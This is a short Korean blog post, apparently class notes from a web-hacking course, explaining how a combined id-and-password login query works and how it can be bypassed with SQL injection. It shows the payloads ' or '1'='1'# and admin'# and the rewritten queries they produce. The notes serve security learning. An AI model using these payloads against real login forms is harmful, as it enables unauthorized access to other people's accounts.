로그인 로직
1. 식별 & 인증 동시
select * from member where id='' AND passwd='';
- 쿼리의 실행 결과가 존재하면 로그인 성공, 실행 결과가 존재하지 않으면 로그인 실패
- id와 passwd column을 동시에 만족하는 row를 가져온다.
로그인 로직별 인증우회
1. 식별 & 인증 동시
select * from member where id='' AND passwd='';
해당 SQL문은 id컬럼과 passwd 컬럼이 동시에 만족하는 row를 가져온다.
따라서 ' or '1'='1'# 을 입력해보자.
select * from member where id=''or'1'='1'#' AND passwd='';
그러면 위와 같이 # 뒤로는 주석처리가 되어 아래와 같은 SQL문이 된다.
select * from member where true;
DB에서 member 테이블을 조회했을 때 맨 위에 출력되는 사용자로 로그인 하게된다.
select * from member where id='admin'#' AND passwd='';
또는 id를 admin으로 가정하고 id를 안다고 했을 때 로그인창에 admin'#을 입력하면 위와 같은 SQL문이 된다.
'Normaltic 웹해킹 취업반' 카테고리의 다른 글
2주차 수업 (1) (0) | 2022.10.22 |
---|---|
1주차 (0) | 2022.10.15 |